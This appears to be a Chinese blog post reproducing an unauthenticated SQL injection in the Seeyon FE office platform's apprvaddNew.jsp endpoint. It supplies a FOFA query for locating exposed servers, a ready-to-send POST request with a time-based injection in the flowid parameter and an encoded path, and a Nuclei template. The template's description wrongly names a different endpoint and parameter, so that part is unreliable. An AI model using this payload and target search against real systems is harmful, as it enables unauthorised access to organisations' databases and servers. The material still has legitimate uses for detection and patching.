【漏洞复现】致远互联FE协作办公平台 apprvaddNew.jsp SQL注入

0x00 漏洞描述

致远互联FE协作办公平台是一款为企业提供全方位协同办公解决方案的产品。
在受影响的版本中,攻击者可以未授权访问/witapprovemanage/apprvaddNew.jsp接口,利用 flowid 参数的缺乏校验,通过传入恶意的 SQL 语句进行命令注入,从而控制服务器。

影响范围

尚不明确

0x01 测绘工具

FOFA:body=“li_plugins_download”
在这里插入图片描述在这里插入图片描述

0x02 漏洞复现

POST /witapprovemanage/apprvaddNew.j%73p HTTP/1.1
Host: x.x.x.x
User-Agent:Mozilla/5.0 (WindowsNT10.0;Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko)Chrome/96.0.4664.93Safari/537.36
Content-Type:application/x-www-form-urlencoded
 
flowid=1';WAITFOR+DELAY+'0:0:5'--

在这里插入图片描述

0x03 Nuclei检测脚本

id: 致远互联FE协作办公平台 apprvaddNew.jsp SQL注入

info:
  name: 致远互联FE协作办公平台 apprvaddNew.jsp SQL注入
  author: admin
  severity: high
  description: 在受影响的版本中,攻击者可以通过未授权访问 /ncchr/pm/obj/queryPsnInfo 接口,利用 staffid 参数的缺乏校验,通过传入恶意的 SQL 语句进行命令注入,从而控制服务器。

requests:
  - method: POST
    path:
      - "{{BaseURL}}/witapprovemanage/apprvaddNew.jsp"

    headers:
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36

    body: |
      flowid=1';WAITFOR+DELAY+'0:0:5'--

    matchers:
      - type: word
        words:
          - "SQL"  # Adjust this based on known error messages if applicable

      - type: dsl
        dsl:
          - "response.time > 5000"  # Check if the response time is greater than 5 seconds

0x04 修复建议

关闭互联网暴露面或接口设置访问权限
升级至安全版本

0x05 免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。
请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。
作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值